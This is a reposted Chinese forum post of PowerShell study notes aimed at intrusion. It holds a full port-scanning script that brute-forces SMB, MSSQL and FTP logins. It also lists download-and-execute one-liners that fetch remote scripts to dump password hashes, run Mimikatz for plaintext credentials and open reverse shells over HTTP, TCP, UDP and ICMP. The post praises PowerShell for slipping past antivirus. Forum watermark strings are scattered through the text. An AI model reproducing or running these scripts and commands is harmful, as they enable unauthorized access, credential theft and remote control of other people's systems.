powershell学习笔记

admin 2021年8月16日22:52:07评论58 views字数 6400阅读21分20秒阅读模式

1.前言
账号又要 被限号了 = = 之前写的文章。发到这里吧
最近powershell 很火,于是就天天去膜拜dm_的blog。学了一些powershell的基础知识,记下这篇笔记T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security+ g$ m2 @/ _- T7 s1 L
powershell 功能异常强大,需要.NET 2.0以上环境,不要第三方支持,白名单,轻松过杀软。 - 低调求发展7 o7 G! _, b L8 o
在win7/server 2008以后,powershell已被集成在系统当中T00LS6 w+ E* m. j% z8 ?+ O! T U
============================================ - 低调求发展9 {9 K* s5 N6 r' T
2.基础语法
有点和php一样呢。直接百度一个网站开始学习。。。www.t00ls.net2 e9 y* k5 A1 Q8 L' c

http://www.pstips.net/powershell-online-tutorials/www.t00ls.net5 h% @/ ?, E: K; m4 ^0 ]! _( @# f

非常简单的学习了一些,来一个脑图:

powershell学习笔记
T00LS3 O9 x9 b( R1 |9 @ S2 j2 V另外需要说明的是如何加载ps脚本的问题:T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security K ?) v h; h+ J& D+ K1 B* r
方法1:powershell IEX (New-Object Net.WebClient).DownloadString('https://raxxxxx/xxx.ps1');
方法2: set-ExecutionPolicy RemoteSignedT00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security! ~ j2 b! M+ a9 ^3 n
Import-Module .xxxxx.ps1 [导入模块] - 低调求发展: J8 a1 {4 I+ f* G% Q0 H
================================
T00LS3 g2 f7 Y9 ( {, g
3.实例代码
学了不用等于白学,招了一个github 源码[https://github.com/samratashok/nishang/tree/master/Scan],
抄抄改改,写出一个端口扫描,并且支持ftp,smb和mssql爆破ps1脚本T00LS# q# f' t7 p/ I0 i
代码:

function Port-Scan {     [CmdletBinding()] Param(         [parameter(Mandatory = $true, Position = 0)]         [ValidatePattern("bd{1,3}.d{1,3}.d{1,3}.d{1,3}b")]         [string]         $StartAddress,          [parameter(Mandatory = $true, Position = 1)]         [ValidatePattern("bd{1,3}.d{1,3}.d{1,3}.d{1,3}b")]         [string]         $EndAddress,                          [string]         $file,                          [int[]]         $Ports = @(21,22,23,53,69,71,80,98,110,139,111,389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,5801,5900,5555,5901),                  [int]         $TimeOut = 100     )       Begin {     $ping = New-Object System.Net.Networkinformation.Ping     }     Process {              #init Brute force SQL Server function     $Connection = New-Object System.Data.SQLClient.SQLConnection                                            $result=@()     foreach($a in ($StartAddress.Split(".")[0]..$EndAddress.Split(".")[0])) {         foreach($b in ($StartAddress.Split(".")[1]..$EndAddress.Split(".")[1])) {         foreach($c in ($StartAddress.Split(".")[2]..$EndAddress.Split(".")[2])) {             foreach($d in ($StartAddress.Split(".")[3]..$EndAddress.Split(".")[3])) {                                                  $ip="$a.$b.$c.$d"                         $pingStatus = $ping.Send($ip,$TimeOut)                                                  $openport=@()                                      if($pingStatus.Status -eq "Success") {                                 write-host "$ip is alive" -ForegroundColor red                                               for($i = 1; $i -le $ports.Count;$i++) {                     $port = $Ports[($i-1)]                     $client = New-Object System.Net.Sockets.TcpClient                     $beginConnect = $client.BeginConnect($pingStatus.Address,$port,$null,$null)                     Start-Sleep -Milli $TimeOut                              if($client.Connected) {                                                                         $openport += $port                                                                                  write-host "$ip open $port" -ForegroundColor red                                                      "$ip open $port" | out-file -Append -filepath $file                                                 }                                                              $client.Close()                                                  }                                                          $iphash=@{ip=$ip;ports=$openport}                         $result +=$iphash                                      }             }         }         }     }                  foreach ($i in $result){                 foreach ($port in $i.ports){                         #brute smb                         $ip=$i.ip                         if($port -eq 445){                                 Write-host "Brute Forcing smb Service on $ip...." -ForegroundColor Yellow                                 $conf=Get-Content 'confsmb.conf'                                 foreach ($j in $conf){                                         $username=$j.Split(":")[0]                                         $password=$j.Split(":")[1]                                                                                  if (wmic /user:$username /password:$password /node:$ip process call create "") {                                                 Write-Host "login smb to $ip with $username : $password is successful" -ForegroundColor green                                                 "login smb to $ip with $username : $password is successful" | out-file -Append -filepath $file                                                 break                                         }else{                                                 Write-Host "login smb to $ip with $username : $password is fail"                                         }                                 }                                                          }                         #brute mssql                         if($port -eq 1433){                                 Write-host "Brute Forcing SQL Service on $ip...."  -ForegroundColor Yellow                                 $conf=Get-Content 'confmssql.conf'                                 foreach ($j in $conf){                                         $username=$j.Split(":")[0]                                         $password=$j.Split(":")[1]                                         $Connection.ConnectionString = "Data Source=$ip;Initial Catalog=Master;User Id=$username;Password=$password;"                                         Try                                         {                                                 $Connection.Open()                                                 $success = $true                                         }                                         Catch                                         {                                                 $success = $false                                                 Write-host "login mssql to $ip with $username : $password fail "                                         }                                         if($success -eq $true)                                          {                                                         Write-host "login mssql to $ip with $username : $Password  is successful" -ForegroundColor green                                                         "login mssql to $ip with $username : $Password  is successful"| out-file -Append -filepath $file                                                         Break                                         }                                  }                                                          }                                                                           if($port -eq 21){                                 Write-host "Brute Forcing ftp Service on $ip...."  -ForegroundColor Yellow                                 $source = "ftp://" + $ip                                          $conf=Get-Content 'confftp.conf'                                 foreach ($j in $conf){                                         Try                                          {                                                 $username=$j.Split(":")[0]                                                 $password=$j.Split(":")[1]                                                                                 $ftpRequest = [System.Net.FtpWebRequest]::Create($source)                                                 $ftpRequest.Method = [System.Net.WebRequestMethods+Ftp]::ListDirectoryDetails                                                 $ftpRequest.Credentials = new-object System.Net.NetworkCredential($username, $password)                                                 $result = $ftpRequest.GetResponse()                                                 $message = $result.BannerMessage + $result.WelcomeMessage                                                 Write-host "login ftp to $ip with $username : $password  is successful" -ForegroundColor green                                                 "login ftp to $ip with $username : $password  is successful"| out-file -Append -filepath $file                                                 break                                         }                                         Catch {                                         Write-host "login ftp to $ip with $username : $password fail "                                         }                                 }                                                           }                                                                    }         }                  Write-host "put all into $file" -ForegroundColor red              }                                         End {     } }

效果:T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security& @& v' U' ]# u" P9 a/ j

powershell学习笔记
powershell学习笔记
bug:T00LS% N0 M6 y* y( j
1.代码是单线程的速度一定慢,不知道powershell要怎么去分配线程池
2.smb直接使用了wmic命令,当密码不对时候会显示一个错误,不知道如何去屏蔽不显示
代码没有没有进行服务指纹识别什么的,还是非常粗糙的 但是毕竟只是练手罢了

================================T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security0 {2 w# r: A' W* X4 W( O
4.一些很屌的powershell工具
4.1.获取hashT00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security9 o: P, T9 j7 ]9 Q
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHasheswww.t00ls.net" e# ]$ |- ~" S2 P9 ?. {4 |) S4 |) G& q

4.2.获取明文---Mimikatz
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
www.t00ls.net c7 o3 / o7 A: W Y' w
4.3 nc---powercat
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

4.4----各种反弹shell
http: - 低调求发展8 k* `: x* s! d& Q9 a5 a
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PoshRatHttps.ps1')
tcp: - 低调求发展: M& f9 Z" _1 @; w* p- q$ g; X
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1')" w# o3 S# b$ x, @7 t* S
udp:
IEX (New-Object Net.WebClient).DownloadString('https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1')3 g8 N& X1 {/ S3 |, D
icmp:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellIcmp.ps1') G! F6 g3 J5 ]$ k

来源:
https://github.com/samratashok/nishang
================================

5.结尾
资料来源:T00LS. f9 ( ! Z/ ~; G3 K0 h8 }
https://github.com/samratashok/nishang/
http://x0day.me/1 P8 C2 l6 p' Q: |, x+ i
http://zone.wooyun.org/content/20429


原文链接:https://www.t00ls.net/thread-30522-1-1.html

powershell学习笔记

本文始发于微信公众号(T00ls):powershell学习笔记

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月16日22:52:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   powershell学习笔记https://cn-sec.com/archives/352199.html

发表评论

匿名网友 填写信息